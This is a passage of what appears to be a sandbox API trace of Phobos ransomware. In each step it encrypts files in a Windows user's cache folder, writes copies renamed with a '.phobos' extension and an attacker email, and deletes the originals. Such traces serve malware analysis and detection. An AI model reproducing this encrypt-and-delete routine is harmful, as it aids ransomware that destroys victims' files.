hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.190] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.190] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x204, lpOverlapped=0x0) returned 1 [0198.193] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x210, dwBufLen=0x210 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x210) returned 1 [0198.193] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x210, lpOverlapped=0x0) returned 1 [0198.194] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0198.194] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.194] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.194] CryptDestroyKey (hKey=0xa32be8) returned 1 [0198.194] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.194] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.194] CloseHandle (hObject=0x140) returned 1 [0198.194] CloseHandle (hObject=0x15c) returned 1 [0198.194] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc")) returned 1 [0198.195] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.196] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=402) returned 1 [0198.196] CloseHandle (hObject=0x15c) returned 1 [0198.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873")) returned 0x2024 [0198.196] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.196] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.196] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.197] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.197] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.197] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x192, lpOverlapped=0x0) returned 1 [0198.198] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a0) returned 1 [0198.198] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a0, lpOverlapped=0x0) returned 1 [0198.198] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0198.198] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.198] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.198] CryptDestroyKey (hKey=0xa32be8) returned 1 [0198.199] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.199] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.199] CloseHandle (hObject=0x15c) returned 1 [0198.199] CloseHandle (hObject=0x140) returned 1 [0198.199] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873")) returned 1 [0198.200] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.201] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=398) returned 1 [0198.201] CloseHandle (hObject=0x140) returned 1 [0198.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce")) returned 0x2024 [0198.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.202] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.202] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.203] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.203] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.203] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x18e, lpOverlapped=0x0) returned 1 [0198.204] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.204] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.204] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0198.204] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.204] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.204] CryptDestroyKey (hKey=0xa32be8) returned 1 [0198.204] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.205] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.205] CloseHandle (hObject=0x140) returned 1 [0198.205] CloseHandle (hObject=0x15c) returned 1 [0198.205] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce")) returned 1 [0198.206] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.206] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=398) returned 1 [0198.206] CloseHandle (hObject=0x15c) returned 1 [0198.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf")) returned 0x2024 [0198.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.206] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.207] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.207] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.207] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.207] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x18e, lpOverlapped=0x0) returned 1 [0198.208] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.208] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.209] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0198.209] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.209] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.209] CryptDestroyKey (hKey=0xa32be8) returned 1 [0198.209] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.209] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.209] CloseHandle (hObject=0x15c) returned 1 [0198.209] CloseHandle (hObject=0x140) returned 1 [0198.209] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf")) returned 1 [0198.210] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.210] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=404) returned 1 [0198.210] CloseHandle (hObject=0x140) returned 1 [0198.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc")) returned 0x2024 [0198.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0198.210] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.211] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0198.211] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0198.211] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.211] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x194, lpOverlapped=0x0) returned 1 [0198.212] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a0) returned 1 [0198.212] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a0, lpOverlapped=0x0) returned 1 [0198.213] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0198.213] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.213] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.213] CryptDestroyKey (hKey=0xa32be8) returned 1 [0198.213] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, 